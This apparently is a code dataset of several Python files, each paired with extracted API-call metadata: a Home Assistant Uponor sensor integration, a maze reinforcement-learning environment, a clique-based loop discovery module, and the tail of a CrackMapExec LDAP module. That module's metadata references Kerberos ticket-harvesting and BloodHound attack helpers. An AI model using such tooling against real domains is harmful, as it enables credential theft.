self.logger.highlight(value[0])
else:
self.logger.error("No entries found!")
return
|
[
"cme.helpers.bloodhound.add_user_bh",
"logging.debug",
"impacket.krb5.types.Principal",
"impacket.ldap.ldap.LDAPConnection",
"cme.logger.CMEAdapter",
"impacket.krb5.kerberosv5.getKerberosTGS",
"impacket.smbconnection.SMBConnection",
"cme.protocols.ldap.kerberos.KerberosAttacks"
] |
[((4128, 4230), 'cme.logger.CMEAdapter', 'CMEAdapter', ([], {'extra': "{'protocol': 'SMB', 'host': self.host, 'port': '445', 'hostname': self.hostname\n }"}), "(extra={'protocol': 'SMB', 'host': self.host, 'port': '445',\n 'hostname': self.hostname})\n", (4138, 4230), False, 'from cme.logger import CMEAdapter\n'), ((7814, 7891), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldap://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldap://%s' % target, self.baseDN, self.kdcHost)\n", (7842, 7891), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((10075, 10152), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldap://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldap://%s' % target, self.baseDN, self.kdcHost)\n", (10103, 10152), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((10791, 10856), 'cme.helpers.bloodhound.add_user_bh', 'add_user_bh', (['self.username', 'self.domain', 'self.logger', 'self.config'], {}), '(self.username, self.domain, self.logger, self.config)\n', (10802, 10856), False, 'from cme.helpers.bloodhound import add_user_bh\n'), ((14291, 14368), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldap://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldap://%s' % target, self.baseDN, self.kdcHost)\n", (14319, 14368), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((14938, 15003), 'cme.helpers.bloodhound.add_user_bh', 'add_user_bh', (['self.username', 'self.domain', 'self.logger', 'self.config'], {}), '(self.username, self.domain, self.logger, self.config)\n', (14949, 15003), False, 'from cme.helpers.bloodhound import add_user_bh\n'), ((17212, 17288), 'impacket.smbconnection.SMBConnection', 'SMBConnection', (['self.host', 'self.host', 'None', '(445)'], {'preferredDialect': 'SMB_DIALECT'}), '(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)\n', (17225, 17288), False, 'from impacket.smbconnection import SMBConnection, SessionError\n'), ((17761, 17807), 'impacket.smbconnection.SMBConnection', 'SMBConnection', (['self.host', 'self.host', 'None', '(445)'], {}), '(self.host, self.host, None, 445)\n', (17774, 17807), False, 'from impacket.smbconnection import SMBConnection, SessionError\n'), ((20928, 20976), 'logging.debug', 'logging.debug', (["('Search Filter=%s' % searchFilter)"], {}), "('Search Filter=%s' % searchFilter)\n", (20941, 20976), False, 'import logging\n'), ((34441, 34463), 'logging.debug', 'logging.debug', (['answers'], {}), '(answers)\n', (34454, 34463), False, 'import logging\n'), ((34803, 34851), 'logging.debug', 'logging.debug', (["('Search Filter=%s' % searchFilter)"], {}), "('Search Filter=%s' % searchFilter)\n", (34816, 34851), False, 'import logging\n'), ((37700, 37722), 'logging.debug', 'logging.debug', (['answers'], {}), '(answers)\n', (37713, 37722), False, 'import logging\n'), ((40143, 40165), 'logging.debug', 'logging.debug', (['answers'], {}), '(answers)\n', (40156, 40165), False, 'import logging\n'), ((8306, 8384), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldaps://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldaps://%s' % target, self.baseDN, self.kdcHost)\n", (8334, 8384), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((9730, 9751), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (9745, 9751), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n'), ((13920, 13941), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (13935, 13941), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n'), ((34250, 34292), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (34263, 34292), False, 'import logging\n'), ((35243, 35348), 'logging.debug', 'logging.debug', (['"""sizeLimitExceeded exception caught, giving up and processing the data received"""'], {}), "(\n 'sizeLimitExceeded exception caught, giving up and processing the data received'\n )\n", (35256, 35348), False, 'import logging\n'), ((37509, 37551), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (37522, 37551), False, 'import logging\n'), ((39952, 39994), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (39965, 39994), False, 'import logging\n'), ((11145, 11223), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldaps://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldaps://%s' % target, self.baseDN, self.kdcHost)\n", (11173, 11223), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((15295, 15373), 'impacket.ldap.ldap.LDAPConnection', 'ldap_impacket.LDAPConnection', (["('ldaps://%s' % target)", 'self.baseDN', 'self.kdcHost'], {}), "('ldaps://%s' % target, self.baseDN, self.kdcHost)\n", (15323, 15373), True, 'from impacket.ldap import ldap as ldap_impacket\n'), ((23869, 23911), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (23882, 23911), False, 'import logging\n'), ((26557, 26599), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (26570, 26599), False, 'import logging\n'), ((30654, 30675), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (30669, 30675), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n'), ((30858, 30924), 'impacket.krb5.types.Principal', 'Principal', (['SPN'], {'type': 'constants.PrincipalNameType.NT_SRV_INST.value'}), '(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)\n', (30867, 30924), False, 'from impacket.krb5.types import KerberosTime, Principal\n'), ((30990, 31098), 'impacket.krb5.kerberosv5.getKerberosTGS', 'getKerberosTGS', (['serverName', 'self.domain', 'self.kdcHost', "TGT['KDC_REP']", "TGT['cipher']", "TGT['sessionKey']"], {}), "(serverName, self.domain, self.kdcHost, TGT['KDC_REP'], TGT[\n 'cipher'], TGT['sessionKey'])\n", (31004, 31098), False, 'from impacket.krb5.kerberosv5 import sendReceive, KerberosError, getKerberosTGT, getKerberosTGS\n'), ((26816, 26837), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (26831, 26837), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n'), ((30119, 30183), 'logging.debug', 'logging.debug', (["('Bypassing disabled account %s ' % sAMAccountName)"], {}), "('Bypassing disabled account %s ' % sAMAccountName)\n", (30132, 30183), False, 'import logging\n'), ((31894, 31936), 'logging.debug', 'logging.debug', (['"""Exception:"""'], {'exc_info': '(True)'}), "('Exception:', exc_info=True)\n", (31907, 31936), False, 'import logging\n'), ((31362, 31383), 'cme.protocols.ldap.kerberos.KerberosAttacks', 'KerberosAttacks', (['self'], {}), '(self)\n', (31377, 31383), False, 'from cme.protocols.ldap.kerberos import KerberosAttacks\n')]
|
"""Uponor U@Home integration
Exposes Sensors for Uponor devices, such as:
- Temperature (UponorThermostatTemperatureSensor)
- Humidity (UponorThermostatHumiditySensor)
- Battery (UponorThermostatBatterySensor)
"""
import voluptuous as vol
from requests.exceptions import RequestException
from homeassistant.exceptions import PlatformNotReady
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
ATTR_ATTRIBUTION,
CONF_NAME, CONF_HOST, CONF_PREFIX,
TEMP_CELSIUS,
DEVICE_CLASS_BATTERY, DEVICE_CLASS_HUMIDITY, DEVICE_CLASS_TEMPERATURE)
import homeassistant.helpers.config_validation as cv
from logging import getLogger
from homeassistant.helpers.entity import Entity
from .uponor_api import UponorClient
from .uponor_api.const import (UNIT_BATTERY, UNIT_HUMIDITY)
_LOGGER = getLogger(__name__)
DEFAULT_NAME = 'Uhome Uponor'
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Optional(CONF_PREFIX): cv.string,
})
async def async_setup_entry(hass, config_entry, async_add_entities):
_LOGGER.info("init setup sensor platform for %s", config_entry)
# return await async_setup_platform(
# hass, config_entry.data, async_add_entities, discovery_info=None
# )
# async def async_setup_platform(
# hass, config, async_add_entities, discovery_info=None
# ) -> bool:
# _LOGGER.info("init setup sensor platform for %s", config)
# host = config[CONF_HOST]
# prefix = config[CONF_PREFIX]
# _LOGGER.info("init setup host %s", host)
# uponor = UponorClient(hass=hass, server=host)
# try:
# await uponor.rescan()
# except (ValueError, RequestException) as err:
# _LOGGER.error("Received error from UHOME: %s", err)
# raise PlatformNotReady
# async_add_entities([UponorThermostatTemperatureSensor(prefix, uponor, thermostat)
# for thermostat in uponor.thermostats], True)
# async_add_entities([UponorThermostatHumiditySensor(prefix, uponor, thermostat)
# for thermostat in uponor.thermostats], True)
# async_add_entities([UponorThermostatBatterySensor(prefix, uponor, thermostat)
# for thermostat in uponor.thermostats], True)
# _LOGGER.info("finish setup sensor platform for Uhome Uponor")
# return True
def setup_platform(hass, config, add_entities, discovery_info=None):
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
prefix = config.get(CONF_PREFIX)
uponor = UponorClient(hass=hass, server=host)
try:
uponor.rescan()
except (ValueError, RequestException) as err:
_LOGGER.error("Received error from UHOME: %s", err)
raise PlatformNotReady
add_entities([UponorThermostatTemperatureSensor(prefix, uponor, thermostat)
for thermostat in uponor.thermostats], True)
add_entities([UponorThermostatHumiditySensor(prefix, uponor, thermostat)
for thermostat in uponor.thermostats], True)
add_entities([UponorThermostatBatterySensor(prefix, uponor, thermostat)
for thermostat in uponor.thermostats], True)
_LOGGER.info("finish setup sensor platform for Uhome Uponor")
class UponorThermostatTemperatureSensor(Entity):
"""HA Temperature sensor entity. Utilizes Uponor U@Home API to interact with U@Home"""
def __init__(self, prefix, uponor_client, thermostat):
self._available = False
self.prefix = prefix
self.uponor_client = uponor_client
self.thermostat = thermostat
self.identity = f"{prefix or ''}controller{thermostat.controller_index}_thermostat{thermostat.thermostat_index}_temp"
# ** Generic **
@property
def name(self):
return f"{self.prefix or ''}{self.thermostat.by_name('room_name').value}"
@property
def unique_id(self):
return self.identity
@property
def icon(self):
return 'mdi:thermometer'
@property
def available(self):
return self._available
# ** DEBUG PROPERTY **
#@property
#def extra_state_attributes(self):
# """Return the device state attributes."""
# attr = self.thermostat.attributes() + self.uponor_client.uhome.attributes()
# return {
# ATTR_ATTRIBUTION: attr,
# }
# ** Static **
@property
def unit_of_measurement(self):
return TEMP_CELSIUS
@property
def device_class(self):
return DEVICE_CLASS_TEMPERATURE
# ** State **
@property
def state(self):
return self.thermostat.by_name('room_temperature').value
# ** Actions **
def update(self):
# Update thermostat
try:
self.thermostat.update()
valid = self.thermostat.is_valid()
self._available = valid
if not valid:
_LOGGER.debug("The thermostat temperature sensor '%s' had invalid data, and is therefore unavailable", self.identity)
except Exception as ex:
self._available = False
_LOGGER.error("Uponor thermostat temperature sensor was unable to update: %s", ex)
class UponorThermostatHumiditySensor(Entity):
"""HA Humidity sensor entity. Utilizes Uponor U@Home API to interact with U@Home"""
def __init__(self, prefix, uponor_client, thermostat):
self._available = False
self.prefix = prefix
self.uponor_client = uponor_client
self.thermostat = thermostat
self.identity = f"{prefix or ''}controller{thermostat.controller_index}_thermostat{thermostat.thermostat_index}_rh"
# ** Generic **
@property
def name(self):
return f"{self.prefix or ''}{self.thermostat.by_name('room_name').value} Humidity"
@property
def unique_id(self):
return self.identity
@property
def icon(self):
return 'mdi:water-percent'
@property
def available(self):
return self._available
# ** Static **
@property
def unit_of_measurement(self):
return UNIT_HUMIDITY
@property
def device_class(self):
return DEVICE_CLASS_HUMIDITY
# ** State **
@property
def state(self):
return self.thermostat.by_name('rh_value').value
# ** Actions **
def update(self):
# Update thermostat
try:
self.thermostat.update()
valid = self.thermostat.is_valid()
self._available = valid
if not valid:
_LOGGER.debug("The thermostat humidity sensor '%s' had invalid data, and is therefore unavailable", self.identity)
except Exception as ex:
self._available = False
_LOGGER.error("Uponor thermostat humidity sensor was unable to update: %s", ex)
class UponorThermostatBatterySensor(Entity):
"""HA Battery sensor entity. Utilizes Uponor U@Home API to interact with U@Home"""
def __init__(self, prefix, uponor_client, thermostat):
self._available = False
self.prefix = prefix
self.uponor_client = uponor_client
self.thermostat = thermostat
self.identity = f"{prefix or ''}controller{thermostat.controller_index}_thermostat{thermostat.thermostat_index}_batt"
# ** Generic **
@property
def name(self):
return f"{self.prefix or ''}{self.thermostat.by_name('room_name').value} Battery"
@property
def unique_id(self):
return self.identity
@property
def available(self):
return self._available
# ** Static **
@property
def unit_of_measurement(self):
return UNIT_BATTERY
@property
def device_class(self):
return DEVICE_CLASS_BATTERY
# ** State **
@property
def state(self):
# If there is a battery alarm, report a low level - else report 100%
if self.thermostat.by_name('battery_alarm').value == 1:
return 10
return 100
# ** Actions **
def update(self):
# Update thermostat
try:
self.thermostat.update()
valid = self.thermostat.is_valid()
self._available = valid
if not valid:
_LOGGER.debug("The thermostat battery sensor '%s' had invalid data, and is therefore unavailable", self.identity)
except Exception as ex:
self._available = False
_LOGGER.error("Uponor thermostat battery sensor was unable to update: %s", ex)
|
[
"voluptuous.Required",
"voluptuous.Optional",
"logging.getLogger"
] |
[((837, 856), 'logging.getLogger', 'getLogger', (['__name__'], {}), '(__name__)\n', (846, 856), False, 'from logging import getLogger\n'), ((936, 959), 'voluptuous.Required', 'vol.Required', (['CONF_HOST'], {}), '(CONF_HOST)\n', (948, 959), True, 'import voluptuous as vol\n'), ((976, 1001), 'voluptuous.Optional', 'vol.Optional', (['CONF_PREFIX'], {}), '(CONF_PREFIX)\n', (988, 1001), True, 'import voluptuous as vol\n')]
|
""" Environment with a distribution of mazes (one new maze is drawn at each episode)
Author: <NAME>
"""
import numpy as np
from deer.base_classes import Environment
#import matplotlib
#matplotlib.use('qt5agg')
#from mpl_toolkits.axes_grid1 import host_subplot
#import mpl_toolkits.axisartist as AA
#import matplotlib.pyplot as plt
import copy
import a_star_path_finding as pf
class MyEnv(Environment):
VALIDATION_MODE = 0
def __init__(self, rng, **kwargs):
self._random_state = rng
self._mode = -1
self._mode_score = 0.0
self._mode_episode_count = 0
self._episode_steps = 0
self._actions = [0,1,2,3]
self._size_maze = 8
self._higher_dim_obs=kwargs.get('higher_dim_obs',False)
self._reverse=kwargs.get('reverse',False)
self._n_walls = int((self._size_maze-2)**2/3.)#int((self._size_maze)**2/3.)
self._n_rewards = 3
self.create_map()
self.intern_dim=3
def create_map(self):
valid_map=False
while valid_map==False:
# Agent
self._pos_agent=[1,1]
# Walls
self._pos_walls=[]
for i in range(self._size_maze):
self._pos_walls.append([i,0])
self._pos_walls.append([i,self._size_maze-1])
for j in range(self._size_maze-2):
self._pos_walls.append([0,j+1])
self._pos_walls.append([self._size_maze-1,j+1])
n=0
while n < self._n_walls:
potential_wall=[self._random_state.randint(1,self._size_maze-2),self._random_state.randint(1,self._size_maze-2)]
if(potential_wall not in self._pos_walls and potential_wall!=self._pos_agent):
self._pos_walls.append(potential_wall)
n+=1
# Rewards
#self._pos_rewards=[[self._size_maze-2,self._size_maze-2]]
self._pos_rewards=[]
n=0
while n < self._n_rewards:
potential_reward=[self._random_state.randint(1,self._size_maze-1),self._random_state.randint(1,self._size_maze-1)]
if(potential_reward not in self._pos_rewards and potential_reward not in self._pos_walls and potential_reward!=self._pos_agent):
self._pos_rewards.append(potential_reward)
n+=1
valid_map=self.is_valid_map(self._pos_agent,self._pos_walls,self._pos_rewards)
def is_valid_map(self,pos_agent,pos_walls,pos_rewards):
a = pf.AStar()
pos_walls
walls = [tuple(w) for w in pos_walls]
start=tuple(pos_agent)
for r in pos_rewards:
end=tuple(r)
a.init_grid(self._size_maze, self._size_maze, walls, start, end)
maze=a
optimal_path=maze.solve()
if(optimal_path==None):
return False
return True
def reset(self, mode):
self._episode_steps = 0
self._mode=mode
self.create_map()
if mode == MyEnv.VALIDATION_MODE:
if self._mode != MyEnv.VALIDATION_MODE:
self._mode = MyEnv.VALIDATION_MODE
self._mode_score = 0.0
self._mode_episode_count = 0
else:
self._mode_episode_count += 1
return [1 * [self._size_maze * [self._size_maze * [0]]]]
def act(self, action):
self._episode_steps += 1
action = self._actions[action]
reward = -0.1
if(action==0):
if([self._pos_agent[0]+1,self._pos_agent[1]] not in self._pos_walls):
self._pos_agent[0]=self._pos_agent[0]+1
elif(action==1):
if([self._pos_agent[0],self._pos_agent[1]+1] not in self._pos_walls):
self._pos_agent[1]=self._pos_agent[1]+1
elif(action==2):
if([self._pos_agent[0]-1,self._pos_agent[1]] not in self._pos_walls):
self._pos_agent[0]=self._pos_agent[0]-1
elif(action==3):
if([self._pos_agent[0],self._pos_agent[1]-1] not in self._pos_walls):
self._pos_agent[1]=self._pos_agent[1]-1
if (self._pos_agent in self._pos_rewards):
reward = 1
self._pos_rewards.remove(self._pos_agent)
self._mode_score += reward
return reward
def summarizePerformance(self, test_data_set, learning_algo, *args, **kwargs):
print ("test_data_set.observations.shape")
print (test_data_set.observations()[0][0:1])
print ("self._mode_score:"+str(self._mode_score)+".")
def inputDimensions(self):
if(self._higher_dim_obs==True):
return [(1,self._size_maze*6,self._size_maze*6)]
else:
return [(1,self._size_maze,self._size_maze)]
def observationType(self, subject):
return np.float32
def nActions(self):
return len(self._actions)
def observe(self):
self._map=np.zeros((self._size_maze,self._size_maze))
for coord_wall in self._pos_walls:
self._map[coord_wall[0],coord_wall[1]]=1
for coord_reward in self._pos_rewards:
self._map[coord_reward[0],coord_reward[1]]=2
self._map[self._pos_agent[0],self._pos_agent[1]]=0.5
if(self._higher_dim_obs==True):
indices_reward=np.argwhere(self._map == 2)
indices_agent=np.argwhere(self._map == 0.5)
self._map=self._map/1.
self._map=np.repeat(np.repeat(self._map, 6, axis=0),6, axis=1)
# agent repr
agent_obs=np.zeros((6,6))
agent_obs[0,2]=0.8
agent_obs[1,0:5]=0.9
agent_obs[2,1:4]=0.9
agent_obs[3,1:4]=0.9
agent_obs[4,1]=0.9
agent_obs[4,3]=0.9
agent_obs[5,0:2]=0.9
agent_obs[5,3:5]=0.9
# reward repr
reward_obs=np.zeros((6,6))
reward_obs[:,1]=0.7
reward_obs[0,1:4]=0.6
reward_obs[1,3]=0.7
reward_obs[2,1:4]=0.6
reward_obs[4,2]=0.7
reward_obs[5,2:4]=0.7
for i in indices_reward:
self._map[i[0]*6:(i[0]+1)*6:,i[1]*6:(i[1]+1)*6]=reward_obs
for i in indices_agent:
self._map[i[0]*6:(i[0]+1)*6:,i[1]*6:(i[1]+1)*6]=agent_obs
self._map=(self._map*2)-1 #scaling
#print ("self._map higher_dim_obs")
#print (self._map)
#plt.imshow(self._map, cmap='gray_r')
#plt.show()
else:
self._map=self._map/2.
self._map[self._map == 0.5] = 0.99 # agent
self._map[self._map == 1.] = 0.5 # reward
if(self._reverse==True):
self._map=-self._map #1-self._map
return [self._map]
def inTerminalState(self):
if ( self._pos_rewards==[] or (self._mode>=0 and self._episode_steps >= 50) ):
return True
else:
return False
if __name__ == "__main__":
import hashlib
rng = np.random.RandomState(123456)
env = MyEnv(rng, higher_dim_obs=False)
maps=[]
for i in range(10000):
env.create_map()
one_laby=env.observe()[0]
# Hashing the labyrinths to be able to find duplicates in O(1)
one_laby=int(hashlib.sha1(str(one_laby).encode('utf-8')).hexdigest(), 16) % (10 ** 8)
# TESTING ADDING DUPLICATION
if i%1000==0:
env.reset(0)
if i%1000==500:
env.reset(1)
maps.append(copy.deepcopy(one_laby))
duplicate_laby=0
for i in range(10000):
env.create_map()
one_laby=env.observe()[0]
# Hashing the labyrinths to be able to find duplicates in O(1)
one_laby=int(hashlib.sha1(str(one_laby).encode('utf-8')).hexdigest(), 16) % (10 ** 8)
# TESTING ADDING DUPLICATION
#if i%1000==0:
# maps.append(one_laby)
# TESTING WITH RESETS
if i%1000==0:
env.reset(0)
if i%1000==500:
env.reset(1)
duplicate=min(maps.count(one_laby),1)
duplicate_laby+=duplicate
if i%1000==0:
print ("Number of duplicate labyrinths:"+str(duplicate_laby)+".")
|
[
"copy.deepcopy",
"numpy.zeros",
"numpy.random.RandomState",
"numpy.argwhere",
"a_star_path_finding.AStar",
"numpy.repeat"
] |
[((7284, 7313), 'numpy.random.RandomState', 'np.random.RandomState', (['(123456)'], {}), '(123456)\n', (7305, 7313), True, 'import numpy as np\n'), ((2589, 2599), 'a_star_path_finding.AStar', 'pf.AStar', ([], {}), '()\n', (2597, 2599), True, 'import a_star_path_finding as pf\n'), ((5148, 5192), 'numpy.zeros', 'np.zeros', (['(self._size_maze, self._size_maze)'], {}), '((self._size_maze, self._size_maze))\n', (5156, 5192), True, 'import numpy as np\n'), ((5521, 5548), 'numpy.argwhere', 'np.argwhere', (['(self._map == 2)'], {}), '(self._map == 2)\n', (5532, 5548), True, 'import numpy as np\n'), ((5575, 5604), 'numpy.argwhere', 'np.argwhere', (['(self._map == 0.5)'], {}), '(self._map == 0.5)\n', (5586, 5604), True, 'import numpy as np\n'), ((5762, 5778), 'numpy.zeros', 'np.zeros', (['(6, 6)'], {}), '((6, 6))\n', (5770, 5778), True, 'import numpy as np\n'), ((6098, 6114), 'numpy.zeros', 'np.zeros', (['(6, 6)'], {}), '((6, 6))\n', (6106, 6114), True, 'import numpy as np\n'), ((7806, 7829), 'copy.deepcopy', 'copy.deepcopy', (['one_laby'], {}), '(one_laby)\n', (7819, 7829), False, 'import copy\n'), ((5672, 5703), 'numpy.repeat', 'np.repeat', (['self._map', '(6)'], {'axis': '(0)'}), '(self._map, 6, axis=0)\n', (5681, 5703), True, 'import numpy as np\n')]
|
# Functions for Cliques Discovery
import networkx as nx
import logging
import sys
import math
logger = logging.getLogger()
def get_successor_by_freq( traces ):
"""
Get successor pairs in every T in traces, and combine them by frequency of appearance.
>>> T = [ list("ABC"), list("ABCABC") ]
>>> get_successor_pairs_by_freq(T)
{('A', 'B'): 3, ('A', 'C'): 3, ('B', 'C'): 3, ('B', 'A'): 1, ('C', 'A'): 1, ('C', 'B'): 1}
"""
logger = logging.getLogger( sys._getframe().f_code.co_name )
pairs_with_freq = {}
L = float(len(traces))
for trace in traces:
for pair in get_successor_pairs(trace):
if pair in pairs_with_freq.keys():
pairs_with_freq[pair] = pairs_with_freq[pair] + 1.0/L
else:
pairs_with_freq[pair] = 1.0/L
By_freq = {}
for (u, v), freq in pairs_with_freq.items():
f = round(freq,3)
if f in By_freq.keys():
By_freq[f].append( (u,v) )
else:
By_freq[f] =[ (u,v) ]
return By_freq
def get_successor_pairs( T_prime ):
"""
Get near successor pairs
Given the trace $T' = s_1 ... s_L$
For every $1 <= i <= L$ find the maximal subtrace starting at $i$
$T_i_j = s_i ... s_j$ such that $s_i \ne s_k$ for all $i < k <= j$
Return the concatenation for all $T_i_j$
[ (s_i, s_k) ] for all s_i \in T_i_j, s_k \in T_i_j for all i < k <= j
ADDED 2020-01-23:
Que no se repitan!
>>> get_successor_pairs(list("ABCD"))
[('A', 'B'), ('A', 'C'), ('A', 'D'), ('B', 'C'), ('B', 'D'), ('C', 'D')]
"""
logger = logging.getLogger( sys._getframe().f_code.co_name )
pairs = []
for i in range(0, len(T_prime)-1):
partial_subtrace = T_prime[i:]
s_i = partial_subtrace.pop(0)
L = len(partial_subtrace)
# Find first first j such s_i == s_j, or L if not exists
# if s_i in partial_subtrace:
# j = partial_subtrace.index(s_i)
# else:
# j = L
# This is the subtrace T_i_j, the maximal that not contains s1
# (Actually, it not contains s_i)
T_i_j=partial_subtrace[:] # Andres 20200124 .. all friends with all, including loops
T_i_j_pairs = [] # 2020-01-23 BEHAVIOR ... but not remove, it doesn't affect
# Construct all s_i, s_k , i < k <= j
for s_k in T_i_j:
e = (s_i, s_k)
pairs.append(e) # 2020-01-20 Old BEHAVIOR
logger.debug("Found pairs: %s" % (pairs) )
return pairs
def successorsGraph(successor_by_freq):
G=nx.DiGraph()
for f, pairs in successor_by_freq.items():
for u, v in pairs:
G.add_edge(u, v, weight=f)
return G
# Sort the cliques and apply the rules:
# 1) The nodes of a single path in their equivalent pair has in_degree=0,1,2,...
# 2) A path is composed for at least 2 ... 3? nodes
def infer_paths(G_freq, min_clique_size=2):
logger = logging.getLogger( sys._getframe().f_code.co_name )
logger.debug("Received a dict G with f=%s" % G_freq.keys())
paths_f = {}
cliques_f = { f: list(nx.algorithms.clique.find_cliques( G_freq[f].to_undirected() )) for f in G_freq.keys() }
logger.debug("All cliques are %s" % cliques_f)
for f, cliques in cliques_f.items():
# logger.debug("Clique[%d] = %s" % (f, cliques) )
paths = []
for clique in cliques:
logger.debug("F=%d, clique=%s" % (f, clique))
# From the original graph(f),
G_complete = G_freq[f].copy()
# remove the nodes not in this clique
for node in set(G_complete.nodes).difference( set(clique) ):
G_complete.remove_node(node)
# Order nodes by inner degree
nodes = sorted( G_complete.in_degree() , key=lambda p: p[1], reverse=False)
logger.debug("Nodes: %s" % nodes)
# - core - CRITERIA 1 and 2
# Strict checking: in_degree(n) in [0, ... , len(N)-1]
if len(nodes) >=min_clique_size and (
all( [in_degree == i for i, (a, in_degree) in zip(range(0, len(nodes)), nodes)] )
or
all( [in_degree == i+1 for i, (a, in_degree) in zip(range(0, len(nodes)), nodes)] )
):
paths.append ( [ a for a, in_degree in nodes ] )
else:
logger.debug("This clique doesn't match the in_degree critera, or it is too small: %s" % nodes)
if paths:
paths_f[f] = paths
logger.info("Paths inferred (min_clique_size=%d: %s)" % (min_clique_size, paths_f) )
return paths_f
def split_in_freqGraphs( successorsGraph ):
logger = logging.getLogger( sys._getframe().f_code.co_name )
u_v_f = [ (u, v, successorsGraph[u][v]["weight"]) for u, v in successorsGraph.edges]
frqs = set([ f for u, v, f in u_v_f])
logger.debug("freqs found: %s" % frqs)
G={}
for f in frqs:
G[f] = successorsGraph.copy()
# Get all nodes whose pairs has weight!=f
for u, v, f2 in u_v_f:
if f != f2:
G[f].remove_edge(u,v)
logger.debug("Nodes in freq=%d: %s" % (f, G[f].nodes) )
logger.debug("About to return a set of G with f=%s" % G.keys())
return G
def remove_loops_in_trace(paths_loop, succ_G):
"""
A loop... should be disjoint with other loops?
I believe YES
"""
logger = logging.getLogger( sys._getframe().f_code.co_name )
loops_found = []
loops_candidates = []
# Look also backwards (it worked!)
for f, paths_f in paths_loop.items():
for path in paths_f:
for p in [ path, list(reversed(path)) ]:
# Magic here
is_a_loop, L = find_loops_in_path(p, succ_G)
if is_a_loop:
if (L,p) not in loops_candidates:
loops_candidates.append( (L,p) )
logger.info("Loop candidate FOUND: repeated %d times in this trace, loop: %s" % (L, p) )
else:
logger.debug("It seems that p is not a loop: %s" % p)
loops_found = loops_candidates
for L, p in loops_found:
# Write correct frequency L for the loop.
for i_u in range(0, len(p)-1):
for i_v in range(i_u + 1, len(p) ):
u, v = p[i_u], p[i_v]
logger.debug("(%s, %s) weight updated from %d to %d" % (u,v,succ_G[u][v]['weight'], L) )
succ_G[u][v]['weight'] = float(L)
# Then remove the back edges from succ_G
# I already stated that the loop is A...Z, then I will remove Z...A
for i_u in range(0, len(p)):
for i_v in range(i_u, len(p)):
logger.debug("Removing %s, %s" % (p[i_v], p[i_u]))
try:
succ_G.remove_edge(p[i_v], p[i_u])
except:
logger.debug("Hohoho! that pair was already removed")
logger.debug("Removed %s" % list(reversed(p)))
return loops_found, succ_G
def find_loops_in_path(p, succ_G):
"""
With all pairs, if ABC is a loop in pairs of len L then
f(A,B) = f(B,C) = L(L+1)/2 and f(B,A) = f(C,B) = L(L-1)/2
"""
logger = logging.getLogger( sys._getframe().f_code.co_name )
is_a_loop, L = False, 0
# Check if p is a loop
logger.debug("Check if p is a loop: %s" % p)
for a, b in [ (a,b) for a,b in zip( p[:-1], p[1:] ) ]:
is_a_loop = True
setL = set()
if is_a_loop and (b, a) in succ_G.edges() and (a, b) in succ_G.edges():
Wab = succ_G[a][b]['weight'] # also, Wab=f by construction
Wba = succ_G[b][a]['weight']
# Combinatory test:
"""
W1 = (L+1)*L/2.0 = (L^2 + L)/2
W2 = L*(L-1)/2.0 = (L^2 - L)/2
2*W1 = L^2 + L
2*W2 = L^2 - L
2(W1+W2) = 2 L^2
L = sqr(W1+W2) # Integer
"""
L = int( math.sqrt(Wab + Wba) )
Lplus1, Lminus1 = (L+1)*L/2.0, L*(L-1)/2.0
# All lengths L must be equal, therefore the set of L must contains 1 and only 1 element
setL.add(L)
logger.debug( (a, b, Wab, Lplus1, Wba, Lminus1, L ))
# Does it agree with combinatory test?
if Wab != Lplus1 or Wba != Lminus1:
is_a_loop = False
else:
is_a_loop = False
if is_a_loop and len(setL) != 1:
is_a_loop = False
return is_a_loop, L
def remember_loops( loops_this_trace, all_loops ):
# Add loops found in this pair to the loops in all traces
for L,p in loops_this_trace:
pt = tuple(p)
if pt not in all_loops.keys():
all_loops[pt] = float(L)
else:
all_loops[pt] += float(L)
return all_loops
def unentangled_DAG(succ_DAG):
succ_G_acyclic_forReal = nx.DiGraph()
E = succ_DAG.edges()
for u, v in E:
if (v, u) not in E:
succ_G_acyclic_forReal.add_edge(u, v, weight=succ_DAG[u][v]["weight"] )
else:
logger.debug("Removing (%s, %s)" % (u,v))
return succ_G_acyclic_forReal
